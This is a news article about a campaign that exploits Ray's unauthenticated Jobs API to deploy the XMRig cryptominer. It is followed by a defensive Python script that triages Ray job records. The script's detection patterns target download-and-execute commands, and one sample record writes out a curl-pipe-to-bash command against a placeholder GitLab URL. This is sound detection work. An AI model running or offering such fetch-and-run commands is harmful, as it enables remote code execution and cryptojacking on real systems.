- Ray clusters remain vulnerable to remote code execution via the Jobs API without authentication.
- Threat group “IronErn440” exploits the vulnerability with AI-generated payloads to deploy the XMRig cryptojacker.
- There are over 230,000 Ray servers available online, up from a few thousand in 2023.
Ray clusters, still exposed to a critical vulnerability discovered years ago, are being used for cryptocurrency mining, data theft, and even distributed denial of service (DDoS) attacks, experts warn.
Cybersecurity researchers at Oligo say this is the second major campaign to exploit the same flaw.
Ray is an open source framework that helps Python programs run faster by distributing work across several machines. Its clusters are groups of computers, one head node and multiple worker nodes, that work together to execute Ray tasks and workloads in a distributed and coordinated manner.
Expanding and hiding XMRig
Back in 2023, Ray 2.6.3 and 2.8.0 were discovered to contain a vulnerability that could allow a remote attacker to execute arbitrary code via the job submission API. However, Anyscale, the company that developed the product, has not patched it because Ray is designed to operate in a “highly controlled network environment.”
In other words, users must protect their infrastructure and ensure that the vulnerability is not abused.
But it was abused, first from September 2023 to March 2024 and again today. Oligo says attackers tracked as “IronErn440” are now using AI-generated payloads to infiltrate vulnerable clusters. Taking advantage of this bug, attackers submit jobs to the Jobs API without authentication, running multi-stage Bash and Python payloads hosted on GitHub and GitLab.
These payloads deploy malware to devices, usually the notorious XMRig cryptojacker. While this cryptojacker is usually easy to detect (since it takes 100% of the device's processing power and renders it useless for almost anything else), attackers have tried to get around this problem by limiting its CPU usage to 60%.
There are more than 230,000 Ray servers connected to the Internet today, the researchers warned, saying the number has grown significantly from the “several thousand” that were available when the vulnerability was first discovered.
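For operators reviewing their own clusters, the following is an added example (not code from the article, Oligo or Ray) that triages exported job records for the pattern described above: entrypoints that pull content from GitHub or GitLab and pipe a download into an interpreter. It assumes job records are available as dicts with `submission_id` and `entrypoint` fields; the sample records and the helper names are constructed for illustration.

```python
import re

# Hosts the article names as payload staging locations (GitHub and GitLab).
CODE_HOSTS = re.compile(
    r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com|gitlab\.com)/\S+",
    re.IGNORECASE,
)
FETCH = re.compile(r"\b(?:curl|wget)\b", re.IGNORECASE)
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:bash|sh|python[\d.]*)\b", re.IGNORECASE)


def triage_job(job):
    """Return the reasons a job record deserves review (empty list if none)."""
    entrypoint = job.get("entrypoint") or ""
    reasons = []
    if CODE_HOSTS.search(entrypoint):
        reasons.append("entrypoint references GitHub/GitLab-hosted content")
    if FETCH.search(entrypoint) and PIPE_TO_INTERPRETER.search(entrypoint):
        reasons.append("download piped into an interpreter")
    if "xmrig" in entrypoint.lower():
        reasons.append("entrypoint mentions xmrig")
    return reasons


def triage_jobs(jobs):
    """Map submission_id -> reasons for every job that matched a rule."""
    flagged = {}
    for job in jobs:
        reasons = triage_job(job)
        if reasons:
            flagged[job.get("submission_id", "<unknown>")] = reasons
    return flagged


# Constructed sample records (assumed shape; IDs, URL path and commands are placeholders).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_constructed_01",
     "entrypoint": "python train.py --epochs 3"},
    {"submission_id": "raysubmit_constructed_02",
     "entrypoint": "curl -s https://gitlab.com/placeholder-user/placeholder-repo/-/raw/main/stage1.sh | bash"},
    {"submission_id": "raysubmit_constructed_03",
     "entrypoint": "python -c \"print('hello')\""},
]

if __name__ == "__main__":
    for submission_id, reasons in triage_jobs(SAMPLE_JOBS).items():
        print(submission_id, "->", "; ".join(reasons))
```

A match is a prompt for review rather than proof of compromise, since legitimate jobs may also fetch code from these hosts.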
By using PipComputer